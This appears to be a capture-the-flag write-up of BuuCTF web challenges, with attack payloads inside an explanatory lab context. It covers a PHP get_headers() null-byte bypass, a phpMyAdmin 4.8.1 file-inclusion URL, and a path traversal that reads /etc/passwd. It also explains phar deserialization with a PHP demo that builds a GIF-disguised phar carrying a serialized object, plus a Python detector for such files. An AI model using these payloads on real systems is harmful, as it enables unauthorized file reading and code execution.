BuuCTF Web Writeup, Part 3

Posted 0d4y


[GKCTF2020] cve版签到 (CVE Sign-in)

Challenge hints

cve-2020-7066
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com 

Bug report the challenge is based on

#79329 get_headers() silently truncates after a null byte

This was tested on php 7.3, but the function has always had this bug.

The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.

Solution

?url=http://127.0.0.123%00.ctfhub.com

Information gathering

Make good use of the PHP bug tracker when searching for vulnerabilities.

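(Unfinished) [安洵杯 2019] easy_web

[GWCTF 2019] 我有一个数据库 (I Have a Database)

Solution

A directory scan finds /phpmyadmin/; visiting it shows the version, 4.8.1.

phpMyAdmin 4.8.1 has a file inclusion vulnerability. Construct ?target=db_datadict.php%253f/../../../../../../../../../flag

(Unfinished) [BJDCTF2020] Mark loves cat

(Unfinished) [CISCN2019 North China Division Day1 Web1] Dropbox

Upload testing shows that only image-type files can be uploaded.

Captured request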

POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1

filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png

After the request is forwarded, the file contents are displayed.

Directory traversal

filename=../../../../../etc/passwd

Result

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin

Main files in the challenge

.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php

class.php is the core file.

class.php (simplified)

<?php

class User {
    public $db;

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        // ... (rest of the method elided in this simplified listing)
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
    
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

The close() method in the File class has an RCE vulnerability.

Q: How can the RCE vulnerability be exploited?

The code never calls unserialize(), but there is a file upload point.

Attack PHP Deserialization Vulnerability via Phar

The Phar File Structure

0x00 A Stub

The stub acts as a marker. Its format is xxx<?php xxx; __HALT_COMPILER();?>. The content before it is unrestricted, but the stub must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize the file as a phar file.

0x01 A Manifest Describing the Contents

A phar file is essentially a compressed archive. The manifest holds the permissions, attributes and other information of each file in the archive. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks.

0x02 The File Contents

These are the contents of the files in the archive.

0x03 A signature for verifying Phar integrity

This part applies to the phar file format only.
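
An added example, not part of the original write-up: a Python check that an upload handler or triage script could run to spot a native-format phar hidden behind an image header, by walking the structure described above (stub terminator, then the manifest with its serialized meta-data). The function names and the sample bytes are constructed for illustration; tar- and zip-based phars are not handled.

```python
import re
import struct
import zlib

# End of stub as ext/phar accepts it: "__HALT_COMPILER();", optionally " ?>" or
# "\n?>", then an optional newline. The manifest starts right after.
HALT = re.compile(rb"__HALT_COMPILER\(\);(?:[ \n]\?>(?:\r\n|\n)?)?")
# serialize() output that names a class to instantiate: O:<n>:"..." or C:<n>:"..."
OBJECT = re.compile(rb'[OC]:\d+:"')


def inspect_phar(data: bytes):
    """Return None if no native-phar manifest is found, else a summary dict."""
    m = HALT.search(data)
    if m is None:
        return None
    pos = m.end()
    try:
        # Little-endian header: manifest length, file count, API version (2 bytes),
        # global flags, alias length; then alias, metadata length, metadata.
        man_len, n_files, _api, _flags, alias_len = struct.unpack_from("<IIHII", data, pos)
        pos += 18 + alias_len
        (meta_len,) = struct.unpack_from("<I", data, pos)
    except struct.error:
        return None
    metadata = data[pos + 4 : pos + 4 + meta_len]
    if meta_len > man_len or len(metadata) != meta_len:
        return None  # lengths do not fit: not a usable manifest
    return {
        "leading_bytes": data[: m.start()][:6],  # what the file claims to be
        "files": n_files,
        "metadata": metadata,
        "object_in_metadata": bool(OBJECT.search(metadata)),
    }


def build_sample() -> bytes:
    """Constructed sample (signature omitted): GIF-prefixed stub, one file entry."""
    meta = b'O:4:"file":1:{s:6:"output";s:10:"phpinfo();";}'
    name, body = b"test.txt", b"test"
    # Entry: name length, name, size, timestamp, compressed size, CRC32, flags, meta length
    entry = struct.pack("<I", len(name)) + name + struct.pack(
        "<IIIIII", len(body), 0, len(body), zlib.crc32(body), 0o644, 0)
    manifest = struct.pack("<IHII", 1, 0x11, 0, 0) + struct.pack("<I", len(meta)) + meta + entry
    return (b"GIF89a<?php __HALT_COMPILER(); ?>\r\n"
            + struct.pack("<I", len(manifest)) + manifest + body)
```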

Demo

Construct a phar file according to the file structure above; PHP has a built-in class (Phar) that handles the related operations.

Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.

<?php
// Demo: build a phar whose manifest carries a serialized object as meta-data.
// Requires phar.readonly=Off, as noted above.

class file {
    public $output; // property that ends up in the serialized meta-data
}

@unlink("phar.phar");
$phar = new Phar("phar.phar"); // suffix must be phar
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
$o = new file();
$o->output = "phpinfo();";
$phar->setMetadata($o); // store custom meta-data in manifest
$phar->addFromString("test.txt", "test"); // compressed file
$phar->stopBuffering(); // automatic computation of signature
